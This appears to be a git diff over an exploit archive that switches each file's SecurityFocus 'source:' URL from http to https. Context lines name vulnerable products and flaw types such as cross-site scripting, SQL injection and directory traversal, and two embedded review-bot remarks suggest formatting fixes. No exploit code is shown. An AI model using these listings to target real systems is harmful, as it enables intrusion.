@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34531/info +source: https://www.securityfocus.com/bid/34531/info Novell Teaming is prone to a user-enumeration weakness and multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/32927.txt b/exploits/java/webapps/32927.txt index 12dc1c6cc..f1addc1a7 100644 --- a/exploits/java/webapps/32927.txt +++ b/exploits/java/webapps/32927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34573/info +source: https://www.securityfocus.com/bid/34573/info BlackBerry Enterprise Server MDS Connection Service is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/java/webapps/32940.txt b/exploits/java/webapps/32940.txt index ef214fbd0..f8e6c4a34 100644 --- a/exploits/java/webapps/32940.txt +++ b/exploits/java/webapps/32940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34643/info +source: https://www.securityfocus.com/bid/34643/info Sun Java System Delegated Administrator is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/33048.txt b/exploits/java/webapps/33048.txt index b00647089..c744f8037 100644 --- a/exploits/java/webapps/33048.txt +++ b/exploits/java/webapps/33048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35450/info +source: https://www.securityfocus.com/bid/35450/info DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33181.txt b/exploits/java/webapps/33181.txt index 8bd0e58a2..ed35ff91f 100644 --- a/exploits/java/webapps/33181.txt +++ b/exploits/java/webapps/33181.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36088/info +source: https://www.securityfocus.com/bid/36088/info Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input. diff --git a/exploits/java/webapps/33254.txt b/exploits/java/webapps/33254.txt index 8f10f43fd..b65587d49 100644 --- a/exploits/java/webapps/33254.txt +++ b/exploits/java/webapps/33254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36513/info +source: https://www.securityfocus.com/bid/36513/info IBM Lotus Connections is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33286.txt b/exploits/java/webapps/33286.txt index 1660254b8..c2e1e3a77 100644 --- a/exploits/java/webapps/33286.txt +++ b/exploits/java/webapps/33286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36674/info +source: https://www.securityfocus.com/bid/36674/info Eclipse BIRT (Business Intelligence and Reporting Tools) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33687.txt b/exploits/java/webapps/33687.txt index fc367edde..7d04768c2 100644 --- a/exploits/java/webapps/33687.txt +++ b/exploits/java/webapps/33687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38483/info +source: https://www.securityfocus.com/bid/38483/info Sparta Systems TrackWise EQMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33939.txt b/exploits/java/webapps/33939.txt index 7876c1c65..cd504e881 100644 --- a/exploits/java/webapps/33939.txt +++ b/exploits/java/webapps/33939.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39941/info +source: https://www.securityfocus.com/bid/39941/info ShopEx Single is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/34108.txt b/exploits/java/webapps/34108.txt index 54b5e469a..374c65cb8 100644 --- a/exploits/java/webapps/34108.txt +++ b/exploits/java/webapps/34108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40630/info +source: https://www.securityfocus.com/bid/40630/info PRTG Traffic Grapher is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/34290.txt b/exploits/java/webapps/34290.txt index 17ffed6b9..8e633c47b 100644 --- a/exploits/java/webapps/34290.txt +++ b/exploits/java/webapps/34290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41529/info +source: https://www.securityfocus.com/bid/41529/info Mac's CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/34293.txt b/exploits/java/webapps/34293.txt index 3f58f68d4..820b693b1 100644 --- a/exploits/java/webapps/34293.txt +++ b/exploits/java/webapps/34293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41541/info +source: https://www.securityfocus.com/bid/41541/info dotDefender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/34345.txt b/exploits/java/webapps/34345.txt index 82c4e4a2e..49449cf55 100644 --- a/exploits/java/webapps/34345.txt +++ b/exploits/java/webapps/34345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41748/info +source: https://www.securityfocus.com/bid/41748/info jCore is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/java/webapps/35683.txt b/exploits/java/webapps/35683.txt index 4063e3e6b..00cfea87e 100644 --- a/exploits/java/webapps/35683.txt +++ b/exploits/java/webapps/35683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47672/info +source: https://www.securityfocus.com/bid/47672/info LANSA aXes Web Terminal TN5250 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/35781.txt b/exploits/java/webapps/35781.txt index 063b9b915..ed10a5ca6 100644 --- a/exploits/java/webapps/35781.txt +++ b/exploits/java/webapps/35781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47905/info +source: https://www.securityfocus.com/bid/47905/info CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/36292.txt b/exploits/java/webapps/36292.txt index a6a6f41a8..91d730a4f 100644 --- a/exploits/java/webapps/36292.txt +++ b/exploits/java/webapps/36292.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50567/info +source: https://www.securityfocus.com/bid/50567/info Oracle NoSQL is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36299.txt b/exploits/java/webapps/36299.txt index c39513c08..135b2288c 100644 --- a/exploits/java/webapps/36299.txt +++ b/exploits/java/webapps/36299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50646/info +source: https://www.securityfocus.com/bid/50646/info Infoblox NetMRI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/java/webapps/36548.txt b/exploits/java/webapps/36548.txt index abdccbd6c..4d7dcbb6b 100644 --- a/exploits/java/webapps/36548.txt 
+++ b/exploits/java/webapps/36548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51404/info +source: https://www.securityfocus.com/bid/51404/info Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/java/webapps/36666.txt b/exploits/java/webapps/36666.txt index 95c9815d1..be6a8f9d3 100644 --- a/exploits/java/webapps/36666.txt +++ b/exploits/java/webapps/36666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51893/info +source: https://www.securityfocus.com/bid/51893/info ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36667.txt b/exploits/java/webapps/36667.txt index 6c89a9e4f..edbbd6cb5 100644 --- a/exploits/java/webapps/36667.txt +++ b/exploits/java/webapps/36667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51893/info +source: https://www.securityfocus.com/bid/51893/info ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36684.txt b/exploits/java/webapps/36684.txt index acc9e2d5d..bab22821b 100644 --- a/exploits/java/webapps/36684.txt +++ b/exploits/java/webapps/36684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51964/info +source: https://www.securityfocus.com/bid/51964/info LxCenter Kloxo is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/36828.txt b/exploits/java/webapps/36828.txt index 210a0e0da..3b997d443 100644 --- a/exploits/java/webapps/36828.txt +++ b/exploits/java/webapps/36828.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52060/info +source: https://www.securityfocus.com/bid/52060/info JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36939.txt b/exploits/java/webapps/36939.txt index e433296ea..37935d819 100644 --- a/exploits/java/webapps/36939.txt +++ b/exploits/java/webapps/36939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52400/info +source: https://www.securityfocus.com/bid/52400/info EJBCA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/36971.txt b/exploits/java/webapps/36971.txt index bdcbd1112..9a2a7159d 100644 --- a/exploits/java/webapps/36971.txt +++ b/exploits/java/webapps/36971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52545/info +source: https://www.securityfocus.com/bid/52545/info JavaBB is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37006.txt b/exploits/java/webapps/37006.txt index 6a7c4010b..f19e94f31 100644 --- a/exploits/java/webapps/37006.txt +++ b/exploits/java/webapps/37006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52672/info +source: https://www.securityfocus.com/bid/52672/info Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37009.xml b/exploits/java/webapps/37009.xml index b259f313d..850e8fe0d 100644 --- a/exploits/java/webapps/37009.xml +++ b/exploits/java/webapps/37009.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52702/info +source: https://www.securityfocus.com/bid/52702/info Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. 
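Review bot: in the exploits/java/webapps/37009.xml hunk, line 1 remains a bare text line, `source: https://www.securityfocus.com/bid/52702/info`, at the top of a file with an .xml extension. If the rest of that file is meant to be parsed as XML, this header should sit inside an XML comment, and since the line is being rewritten anyway this patch is a reasonable place to do it. If the plain-text header is intentional for every file type, say so in the commit message.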
diff --git a/exploits/java/webapps/37029.txt b/exploits/java/webapps/37029.txt index c4cb82fa9..52d722dfb 100644 --- a/exploits/java/webapps/37029.txt +++ b/exploits/java/webapps/37029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37030.txt b/exploits/java/webapps/37030.txt index 541cb4f1f..10cb380aa 100644 --- a/exploits/java/webapps/37030.txt +++ b/exploits/java/webapps/37030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37031.txt b/exploits/java/webapps/37031.txt index bdb255ef1..007c28f58 100644 --- a/exploits/java/webapps/37031.txt +++ b/exploits/java/webapps/37031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37032.txt b/exploits/java/webapps/37032.txt index 46157108e..0544b9d88 100644 --- a/exploits/java/webapps/37032.txt +++ b/exploits/java/webapps/37032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37033.txt b/exploits/java/webapps/37033.txt index 79940757e..d07742b7b 100644 --- a/exploits/java/webapps/37033.txt +++ b/exploits/java/webapps/37033.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52845/info +source: https://www.securityfocus.com/bid/52845/info DirectAdmin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37372.html b/exploits/java/webapps/37372.html index 23aff5419..692fa7711 100644 --- a/exploits/java/webapps/37372.html +++ b/exploits/java/webapps/37372.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53924/info +source: https://www.securityfocus.com/bid/53924/info Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. diff --git a/exploits/java/webapps/37416.txt b/exploits/java/webapps/37416.txt index 850886d11..b0ce93516 100644 --- a/exploits/java/webapps/37416.txt +++ b/exploits/java/webapps/37416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54049/info +source: https://www.securityfocus.com/bid/54049/info Squiz CMS is prone to multiple cross-site scripting vulnerabilities and an XML external entity injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/37555.txt b/exploits/java/webapps/37555.txt index a6917613d..8d99e19ec 100644 --- a/exploits/java/webapps/37555.txt +++ b/exploits/java/webapps/37555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54756/info +source: https://www.securityfocus.com/bid/54756/info ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/java/webapps/37557.txt b/exploits/java/webapps/37557.txt index 72daf915a..f81f24e13 100644 --- a/exploits/java/webapps/37557.txt +++ b/exploits/java/webapps/37557.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54759/info +source: https://www.securityfocus.com/bid/54759/info ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/37589.txt b/exploits/java/webapps/37589.txt index 07880aa40..5ae479f1a 100644 --- a/exploits/java/webapps/37589.txt +++ b/exploits/java/webapps/37589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54881/info +source: https://www.securityfocus.com/bid/54881/info The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/38130.txt b/exploits/java/webapps/38130.txt index 2754845fa..fc893da6c 100644 --- a/exploits/java/webapps/38130.txt +++ b/exploits/java/webapps/38130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56933/info +source: https://www.securityfocus.com/bid/56933/info N-central is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/java/webapps/38358.txt b/exploits/java/webapps/38358.txt index 98ab9f496..6ddcca516 100644 --- a/exploits/java/webapps/38358.txt +++ b/exploits/java/webapps/38358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58293/info +source: https://www.securityfocus.com/bid/58293/info HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/38461.txt b/exploits/java/webapps/38461.txt index 4f4bb6977..789ed142e 100644 --- a/exploits/java/webapps/38461.txt +++ b/exploits/java/webapps/38461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59041/info +source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/java/webapps/38462.txt b/exploits/java/webapps/38462.txt index 41ba06e49..6f98eef79 100644 --- a/exploits/java/webapps/38462.txt +++ b/exploits/java/webapps/38462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59041/info +source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/38739.txt b/exploits/java/webapps/38739.txt index 8af3ada53..26ec1e516 100644 --- a/exploits/java/webapps/38739.txt +++ b/exploits/java/webapps/38739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61974/info +source: https://www.securityfocus.com/bid/61974/info SearchBlox is prone to multiple information-disclosure vulnerabilities. diff --git a/exploits/java/webapps/39334.txt b/exploits/java/webapps/39334.txt index 73f06c6a7..430019215 100644 --- a/exploits/java/webapps/39334.txt +++ b/exploits/java/webapps/39334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68022/info +source: https://www.securityfocus.com/bid/68022/info Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/dos/37218.txt b/exploits/jsp/dos/37218.txt index b3325e132..5a794a66e 100644 --- a/exploits/jsp/dos/37218.txt +++ b/exploits/jsp/dos/37218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53595/info +source: https://www.securityfocus.com/bid/53595/info JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. diff --git a/exploits/jsp/remote/20412.txt b/exploits/jsp/remote/20412.txt index e613544b5..fa7ffe9be 100644 --- a/exploits/jsp/remote/20412.txt +++ b/exploits/jsp/remote/20412.txt 
@@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1970/info +source : https://www.securityfocus.com/bid/1970/info Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. diff --git a/exploits/jsp/remote/20429.txt b/exploits/jsp/remote/20429.txt index b4b57386f..bf274c4a1 100644 --- a/exploits/jsp/remote/20429.txt +++ b/exploits/jsp/remote/20429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1986/info +source: https://www.securityfocus.com/bid/1986/info Resin is a servlet and JSP engine that supports java and javascript. diff --git a/exploits/jsp/remote/20592.txt b/exploits/jsp/remote/20592.txt index c93c828ae..40dc52725 100644 --- a/exploits/jsp/remote/20592.txt +++ b/exploits/jsp/remote/20592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2288/info +source: https://www.securityfocus.com/bid/2288/info A problem with Oracle on the Windows 2000 platform could allow users access to restricted information. This problem in the handling of input by the Oracle software may result in remote users being permitted read access to files on the same partition as the webroot directory. diff --git a/exploits/jsp/remote/21355.txt b/exploits/jsp/remote/21355.txt index 46e9ece9b..f88e4a80b 100644 --- a/exploits/jsp/remote/21355.txt +++ b/exploits/jsp/remote/21355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4372/info +source: https://www.securityfocus.com/bid/4372/info Citrix NFuse is an application portal server meant to provide the functionality of any application on the server via a web browser. NFuse works in conjunction with a previously-installed webserver. NFuse is said to support almost any operating system, including Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/jsp/webapps/21621.txt b/exploits/jsp/webapps/21621.txt index e6b2c8a7d..c39e86ff7 100644 
--- a/exploits/jsp/webapps/21621.txt +++ b/exploits/jsp/webapps/21621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5249/info +source: https://www.securityfocus.com/bid/5249/info Macromedia Sitespring is a J2EE-compliant product for managing website production. The Macromedia Sitespring server runs on Microsoft Windows operating systems. diff --git a/exploits/jsp/webapps/21875.txt b/exploits/jsp/webapps/21875.txt index 11214ffba..2ac987c58 100644 --- a/exploits/jsp/webapps/21875.txt +++ b/exploits/jsp/webapps/21875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5821/info +source: https://www.securityfocus.com/bid/5821/info Jetty is a freely available, open source Java Web Server and Servlet Container. It is available for Linux, Unix, and Microsoft Windows platforms. diff --git a/exploits/jsp/webapps/22805.txt b/exploits/jsp/webapps/22805.txt index 132359c48..6e30aa9ff 100644 --- a/exploits/jsp/webapps/22805.txt +++ b/exploits/jsp/webapps/22805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7969/info +source: https://www.securityfocus.com/bid/7969/info Reportedly, Tmax Soft JEUS is vulnerable to a cross site-scripting attack. The vulnerability is present in the url.jsp script of the Tmax Soft JEUS server. diff --git a/exploits/jsp/webapps/22849.txt b/exploits/jsp/webapps/22849.txt index 9a3fb4891..f48ddb012 100644 --- a/exploits/jsp/webapps/22849.txt +++ b/exploits/jsp/webapps/22849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8073/info +source: https://www.securityfocus.com/bid/8073/info It has been reported that Verity K2 Toolkit does not sufficiently filter user-supplied search parameters. diff --git a/exploits/jsp/webapps/22857.txt b/exploits/jsp/webapps/22857.txt index 5ad3f0e50..0afa2ed5d 100644 --- a/exploits/jsp/webapps/22857.txt +++ b/exploits/jsp/webapps/22857.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8074/info +source: https://www.securityfocus.com/bid/8074/info It has been reported that the K2 Toolkit does not sufficiently sanitize input by users. Because of this, it may be possible for an attacker to launch an attack that results in the execution of hostile HTML or script code in the browsers of users that have loaded a malicious link created by the attacker. diff --git a/exploits/jsp/webapps/23262.txt b/exploits/jsp/webapps/23262.txt index f00cfbc2d..3f1a9af3b 100644 --- a/exploits/jsp/webapps/23262.txt +++ b/exploits/jsp/webapps/23262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8852/info +source: https://www.securityfocus.com/bid/8852/info It has been reported that Caucho Resin is prone to multiple HTML Injection and cross-site scripting vulnerabilities in various scripts that may allow a remote attacker to cause hostile HTML or script code to be rendered in the browser of a user who follows a malicious link supplied by the attacker. diff --git a/exploits/jsp/webapps/23315.txt b/exploits/jsp/webapps/23315.txt index 85837ca61..0721cc362 100644 --- a/exploits/jsp/webapps/23315.txt +++ b/exploits/jsp/webapps/23315.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8938/info +source: https://www.securityfocus.com/bid/8938/info It has been reported that BEA WebLogic InteractiveQuery.jsp example application is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data in an initialization argument called 'person'. It has been reported that if an invalid value is passed to this argument, the software returns the value back to the user in a results page without proper sanitization. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. 
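Review bot: the exploits/jsp/remote/20412.txt hunk above keeps the stray space before the colon in `+source : https://www.securityfocus.com/bid/1970/info`, while the other files shown in this patch use `source:`. The line is being rewritten anyway, so normalise it to `source: https://www.securityfocus.com/bid/1970/info`; otherwise a search or script anchored on `source: ` will keep missing this file.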
diff --git a/exploits/jsp/webapps/23402.txt b/exploits/jsp/webapps/23402.txt index 4d3af6739..284582c1b 100644 --- a/exploits/jsp/webapps/23402.txt +++ b/exploits/jsp/webapps/23402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9112/info +source: https://www.securityfocus.com/bid/9112/info A number of cross-site scripting vulnerabilities have been reported for Macromedia Jrun, specifically in the administrative interface. The problem is said to occur due to insufficient sanitization of URI parameters that may be passed to the page by an unauthenticated user. diff --git a/exploits/jsp/webapps/23872.txt b/exploits/jsp/webapps/23872.txt index 9eb484eb6..0022480f6 100644 --- a/exploits/jsp/webapps/23872.txt +++ b/exploits/jsp/webapps/23872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9951/info +source: https://www.securityfocus.com/bid/9951/info It has been reported that ReGet may be prone to a directory traversal vulnerability that may allow remote attackers to upload files to arbitrary locations on a target system. The attacker may supply encoded directory traversal sequences in the URI parameter so that the requested file is saved outside of the default download directory specified by the user. diff --git a/exploits/jsp/webapps/24139.txt b/exploits/jsp/webapps/24139.txt index 9dbd6c894..0759667ec 100644 --- a/exploits/jsp/webapps/24139.txt +++ b/exploits/jsp/webapps/24139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10402/info +source: https://www.securityfocus.com/bid/10402/info It has been reported that Liferay Enterprise Portal is susceptible to multiple cross-site scripting and HTML injection vulnerabilities. User-supplied data from many input fields is included in server generated content without appropriate validation/encoding. This may allow for typical cross-site scripting attacks against other users of the portal. 
diff --git a/exploits/jsp/webapps/24773.txt b/exploits/jsp/webapps/24773.txt index fad47a3ea..a7f0a23f9 100644 --- a/exploits/jsp/webapps/24773.txt +++ b/exploits/jsp/webapps/24773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11746/info +source: https://www.securityfocus.com/bid/11746/info It is reported that JSPWiki is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated Web pages. diff --git a/exploits/jsp/webapps/25159.txt b/exploits/jsp/webapps/25159.txt index 39390a38e..3d54b5b2c 100644 --- a/exploits/jsp/webapps/25159.txt +++ b/exploits/jsp/webapps/25159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12649/info +source: https://www.securityfocus.com/bid/12649/info Cyclades AlterPath Manager is a network device designed to facilitate remote administration of all network-accessible infrastructure resources. diff --git a/exploits/jsp/webapps/25198.txt b/exploits/jsp/webapps/25198.txt index 88c94b221..f844e7659 100644 --- a/exploits/jsp/webapps/25198.txt +++ b/exploits/jsp/webapps/25198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12752/info +source: https://www.securityfocus.com/bid/12752/info Participate Enterprise is reported prone to multiple access validation vulnerabilities. These issues may allow remote attackers to disclose sensitive information and corrupt and delete data that can ultimately lead to a denial of service condition. diff --git a/exploits/jsp/webapps/25269.txt b/exploits/jsp/webapps/25269.txt index 37c46d9eb..cfdce8113 100644 --- a/exploits/jsp/webapps/25269.txt +++ b/exploits/jsp/webapps/25269.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12892/info +source: https://www.securityfocus.com/bid/12892/info Multiple remote cross-site scripting vulnerabilities affect Oracle Reports Server. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/jsp/webapps/25628.txt b/exploits/jsp/webapps/25628.txt index 64d643157..7fe0ca955 100644 --- a/exploits/jsp/webapps/25628.txt +++ b/exploits/jsp/webapps/25628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13545/info +source: https://www.securityfocus.com/bid/13545/info The phpbb vendor reports that a critical vulnerability exists in the BBCode handling routines of the 'bbcode.php' script. diff --git a/exploits/jsp/webapps/25685.txt b/exploits/jsp/webapps/25685.txt index fc90b51c6..893a1047e 100644 --- a/exploits/jsp/webapps/25685.txt +++ b/exploits/jsp/webapps/25685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13683/info +source: https://www.securityfocus.com/bid/13683/info The MimeMessage method in the Sun JavaMail API does not perform sufficient validation on message number values that are passed to the method during requests. An attacker that can successfully authenticate to an email server implementation that is written using the Sun JavaMail API, may exploit this issue to make requests for arbitrary email messages that are stored on the server. diff --git a/exploits/jsp/webapps/25738.txt b/exploits/jsp/webapps/25738.txt index 1964c7795..056d95537 100644 --- a/exploits/jsp/webapps/25738.txt +++ b/exploits/jsp/webapps/25738.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13793/info +source: https://www.securityfocus.com/bid/13793/info BEA WebLogic Server And WebLogic Express are affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'LoginForm.jsp' script. diff --git a/exploits/jsp/webapps/25739.txt b/exploits/jsp/webapps/25739.txt index 8faece2dc..50cd4b4f2 100644 --- a/exploits/jsp/webapps/25739.txt +++ b/exploits/jsp/webapps/25739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13794/info +source: https://www.securityfocus.com/bid/13794/info BEA WebLogic Server And WebLogic Express are affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the error page. diff --git a/exploits/jsp/webapps/25946.txt b/exploits/jsp/webapps/25946.txt index 1bc8fccfc..a2f75e5e2 100644 --- a/exploits/jsp/webapps/25946.txt +++ b/exploits/jsp/webapps/25946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14167/info +source: https://www.securityfocus.com/bid/14167/info McAfee IntruShield Security Management System is susceptible to multiple vulnerabilities. diff --git a/exploits/jsp/webapps/26354.txt b/exploits/jsp/webapps/26354.txt index 9a670e750..febf28108 100644 --- a/exploits/jsp/webapps/26354.txt +++ b/exploits/jsp/webapps/26354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15127/info +source: https://www.securityfocus.com/bid/15127/info NetFlow Analyzer 4 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/26532.txt b/exploits/jsp/webapps/26532.txt index 04c9144ef..076064608 100644 --- a/exploits/jsp/webapps/26532.txt +++ b/exploits/jsp/webapps/26532.txt 
